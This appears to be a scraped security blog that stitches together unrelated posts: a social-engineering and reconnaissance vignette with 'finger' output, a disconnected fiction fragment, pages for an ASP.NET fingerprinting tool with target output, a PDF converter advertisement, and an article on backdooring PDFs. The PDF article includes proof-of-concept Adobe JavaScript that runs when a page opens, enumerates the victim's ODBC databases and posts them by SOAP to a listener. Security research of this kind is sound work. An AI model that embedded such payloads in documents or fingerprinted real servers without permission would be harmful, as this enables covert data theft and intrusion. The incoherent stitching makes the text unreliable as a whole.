Operation n

Ring, ring…

“Hello?”
“Hi, I’m looking for Michael Daw?”
“Speaking, how may I help you?”
“Hi Michael, my name is Ian Lambert. I am a member of Pittman’s Recruitment. We specialise in security recruiting. We have a common acquaintance, Peter Smith?”
…

“Isn’t it true, its not what you know but who you know” I thought to myself as I put the phone down.

A spark went off in my head as I pondered over my conversation with Ian. How much information is available on social networks? My next question dismissed the first, “Why would I care?” I sat back in my comfortable lazy boy chair and let out a big sigh.

The old Unix finger daemon popped into my head. This service running on (79/TCP) allowed remote users to query a server for logged in users. Back in the day attackers loved this service. It meant they could remotely enumerate valid usernames. I logged into my Unix server to remind myself of the information disclosed via this service:

$ finger
Login     Name       	Tty      Idle  Login Time   Office     Office Phone
root      superman   	pts/0          Sep 11 18:11 (10.10.1.5)
michael  Michael Daw	pts/1          Sep 11 22:19 (10.10.1.90)

$ finger michael
Login: michael                              Name: Michael Daw
Directory: /home/michael                   Shell: /bin/bash
On since Sun Sep 11 18:11 (BST) on pts/0 from 10.10.1.90
   2 minutes 25 seconds idle
On since Sun Sep 11 22:19 (BST) on pts/1 from 10.10.1.90
New mail received Sun Sep 11 22:20 2006 (BST)
     Unread since Fri Aug 25 22:13 2006 (BST)
No Plan.

I then logged into LinkedIn.com, which is an Internet social network service, used mostly for business connections. It has over 2.5 million registered users, including 630,000 in Europe and 170,000 in Asia. Social networks were appearing everywhere. They included sites such as, www.facebook.com, www.myspace.com, www.classmates.com, www.sixdegrees.com, and www.friendster.com, to name a few.

A grin crossed my face as my eyes fell upon the “Search by company” option. I clicked my fingers and entered, Google (my favourite prey):

We found 17 users in your network matching your criteria:

    * Users currently at: google
    * Sorted by: keyword relevance

Who needs Finger I chuckled.

This was one technique that could be used in Targeted XSS Attacks using only HTTP (Hackers Totally Trusted Protocol).

References:
http://en.wikipedia.org/wiki/LinkedIn

It felt as if any minute, my heart would come tearing through my chest. I had stopped just outside the building to catch my breath.

As I looked out into the night I noticed something frightfully peculiar. At that moment my head felt as if it was in a James Bond cocktail.

“Nothing, absolutely nothing” I whispered.

The lights from the building had lit up the night air creating a two or three meter perimeter, and then nothing! Not a light, not a sound, nothing! My greatest fear had always been the nothingness of space. It reminded me of a blackhole.

I had imagined being sucked into a blackhole as a boy. I had often pondered over space singularity’s. If anyone could ever survive the gravitational forces of such a monster, would he be trapped in a place where time and the emptiness of space were infinite, unable to escape the grasp of such a thing.

“Walking into the pitch black night is not my idea of a night out,” I said trying to cheer myself up in what seemed a dire situation.

After a few meters the tips of my fingers connected with a wall type structure.

I began to panic, I felt like a trapped Gecko.

Above me were stars. Their glaze giving me some comfort, and lighting a black framed wall which lay in front of me. I jumped in desparation attempting to scale the wall. After a few minutes of jumping my fingers and hands were feeling raw.

“Michael, where are you?” I could see Cole standing by the door. I quietly and carefully bent down until haunched, and then lay down gently so that my stomach was touching the floor.

“Michael, I know this has been a crazy night for you, but its going to be alright. If I was going to do something, I would have done it already. Come out so we can talk, I promise nothing will happen to you, you mean to much to me and this institution. ”

ASP auditor v2 BETA
Author david.kierznowski_at_gmail.com
http://michaeldaw.org

purpose: Look for common misconfigurations and information leaks in
ASP.NET applications.

# Changelog:
# --v2.2-- 20/Apr/07
# * Added additional support for Anti-XSS Validation detection.
# * Added ASP Source Directory Leak Check
# * Added Apr/07 ASP.NET Validation Bypass Check
#
# –v2.1– 25/Sep/06
# * GET /Trace.axd often leaks ASP.NET version when other methods fail.
# * Fixed “?” bug in JavaScript Validate test
# * Added Version into usage()
#
# –v2.0– 16/Sep/06
# * Version plugin allowing specific ASP.NET versioning.
# * Version brute force capabilities using JavaScript validate
# directories.
# * Check if global ASP.NET validate is being used.
# * Added brute force function and option in usage()

This tool is based on H D Moore’s Dot Net Application Scanner
Author: H D Moore <hdm_at_digitaloffense.net>
URL: http://www.digitaloffense.net/index.html?section=TOOLS

Credits:
HDM thanks for the feedback.

--usage
$ ./asp-audit-latest.pl

Usage:   ./asp-audit-latest.pl [http://target/app/file.aspx] (opts)

        (opts)
            -bf brute force ASP.NET version using JS Validate
            directories.

–example 1
$ ./asp-audit.pl http://www.*hidden*/index.aspx
[*] Sending initial probe request…
[*] Sending path discovery request…
[*] Sending ASP.NET validate discovery request…
[*] Sending application trace request…
[*] Sending null remoter service request…

[ .NET Configuration Analysis ]

  Server   -> Microsoft-IIS/6.0
  Application   -> /
  FilePath   -> D:\VirtualServers\*hidden*
  ADNVersion   -> 1.1.4322.2300

  matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1)  Mar 2005

–example 2
$ ./asp-audit.pl http://www.*hidden*/index.aspx -bf
[*] Sending initial probe request…
[*] Sending path discovery request…
[*] Sending ASP.NET validate discovery request…
[*] Sending application trace request…
[*] Sending null remoter service request…

[ .NET Configuration Analysis ]

    Server  -> Microsoft-IIS/6.0
    AppTrace  -> LocalOnly
    Application  -> /
    FilePath  -> D:\inetpub\*hidden*
    ADNVersion  -> 1.1.4322.2300

    matches -> 1.1.4322.2300 Version 1.1 Post-SP1 (Windows Server 2003 SP1)  Mar 2005

[*] Sending brute force discovery requests…
        Found -> /aspnet_client/system_web/1_1_4322

The tool can be downloaded here:
http://michaeldaw.org/projects/asp-audit-latest.tar.gz

Have you ever needed to edit a PDF file?  Try this PDF converter that can convert a pdf to word or excel in a flash.  It can even keep forms tables in their original format!

Updates:

• 20/09/07 - PDP’s PDF URI Parsing Vulnerability
• 04/01/06 - New PDF Vulnerability

Recently, there has been alot of hype involving backdooring various web technologies. pdp (arcitect) has done alot of work centered around this area.

I saw Jeremiah Grossman mention PDF’s being “BAD”, however, I was unable to easily locate any practical reasons as to why. I decided to investigate this a little further.

At first glance PDF documents seem obviously vulnerable. This is due to the fact that it supports JavaScript. However, there are quite a few twists and turns. It is by no means as straight forward as this.

Adobe supports its own JavaScript object model. For example, “alert(’xss’)” must be called from the app object, so this becomes “app.alert(’xss’)”. This means JavaScript attacks are limited to the functionality supported within Adobe. Secondly, Adobe Reader and Adobe Professional (the two apps I focus on in this article) are very different with regards to which JavaScript objects are allowed.

This article will give two practical examples of how Adobe Professional and Adobe Reader can be backdoored. There are 7 or more points where an attacker can launch malicious code. Both of the attacks discussed below are attached to the “Page Open” event.

The trigger can be accessed via “Page Properties | Actions tab”.

The first attack is simple and affects both Adobe Reader and Adobe Professional. It involves adding a malicious link into the PDF document. Once the document is opened, the user’s browser is automatically launched and the link is accessed. At this point it is obvious that any malicious code be launched. It is interesting to note that both Adobe 6 & 7 did not warn me before launching these URLs.

The second attack involves utilising Adobe’s ADBC (Adobe Database Connectivity) and Web Services support. The following proof of concept code accesses the Windows ODBC, enumerates available databases and then sends this information to “localhost” via the web service.

var cURL = "http://localhost/";
var cTestString = "";

var databaseList = ADBC.getDataSourceList();

var DB = "";
  if (databaseList != null) {
    for (var i=0; i<databaseList.length ; i++)
     DB+=databaseList[i].name;
   }

 cTestString = DB;

 var response = SOAP.request( {
   cURL: cURL,
   oRequest: {
     “http://myxmlns/:echoString”: {
      inputString: cTestString
     }
   },
 cAction: “http://additional-opt/”
});

var result = response["http://no-need/:echoStringResponse"]["return"];

On the server side we get this:
$ ./nc.exe -l -p 80 -v
listening on [any] 80 …
connect to [127.0.0.1] from localhost [127.0.0.1] 1924
POST / HTTP/1.1
Accept: */*
Content-Type: text/xml; charset=UTF-8
SOAPAction: “http://additional-opt/”
Content-Length: 578
User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)
Host: localhost
Connection: Keep-Alive
Cache-Control: no-cache

<?xml version=”1.0″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” xm
lns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsd=”http://www.w
3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”><SOA
P-ENV:Body><ns0:echoString SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/so
ap/encoding/” xmlns:ns0=”http://myxmlns/”><inputString xsi:type=”xsd:string”>MS
Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Files
dbase1</inputString>
</ns0:echoString>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I am sure with a bit more creativity even simpler and/or more advanced attacks could be put together. Adobe Acrabat supports, “HTML forms”, “File system access” and the list goes on.
One of the other interesting finds was the fact that you can backdoor all Adobe Acrabat files by loading a backdoored JavaScript file into your %ADOBE-VERSION-DIR%\Acrobat\Javascripts directory.

Proof of concept for example 1 can be found here.
Proof of concept for example 2 can be found here.

ASP Auditor v1.0 BETA
Author: David Kierznowski (david.kierznowski_at_gmail.com)
http://michaeldaw.org/projects/

PLEASE NOTE THIS V1.0 IS DEPRECATED.
Please see the following link for the latest information regarding this tool: http://michaeldaw.org/projects/asp-auditor-v2/

The purpose of ASP Auditor is to identify vulnerable and weakly configured ASP.NET servers.

Usage:
$ ./asp-audit.pl
ASP Audit v1.0 (BETA) [ david.kierznowski@gmail.com ]
        Usage:   ./asp-audit.pl (opts) [host] [port]

        (opts)
            -h these usage instructions
            -b brute force ASP.NET version using JS Validate
            directories.
            -m match against fingerprints
            -v verbose messaging

Some examples can be seen below:

$ ./asp-audit.pl labs.microsoft.com
Target: labs.microsoft.com
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: 2.0.50727
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: No

$ ./asp-audit.pl -m labs.microsoft.com
Target: labs.microsoft.com
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: 2.0.50727
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: No

Fingerprint matches:
2.0.50727.07    Version 2.0 (Visual Studio.NET 2005 CTP)        Aug 2005
2.0.50727.26    Version 2.0 (Visual Studio.NET 2005 RC / SQL Server 2005 CTP)  Sep 2005
2.0.50727.42    Version 2.0 RTM (Visual Studio.NET 2005 RTM / SQL Server 2005 RTM)      Nov 2005

$ ./asp-audit.pl *hidden*
Target: *hidden*
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: Unknown
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: YES

$ ./asp-audit.pl -b *hidden*
Target: *hidden*
Server Software: Microsoft-IIS/6.0
ASP Framework: YES
ASP Simple Version: Unknown
ASP Specific Version: Unknown
ASP verbose messages: No
ASP Validate: No
Default Error Messages: YES

Found: aspnet_client/system_web/1_1_4322
Found: aspnet_client/system_web/2_0_50727

The tool can be downloaded here:
http://michaeldaw.org/projects/asp-audit-v1BETA.tar.gz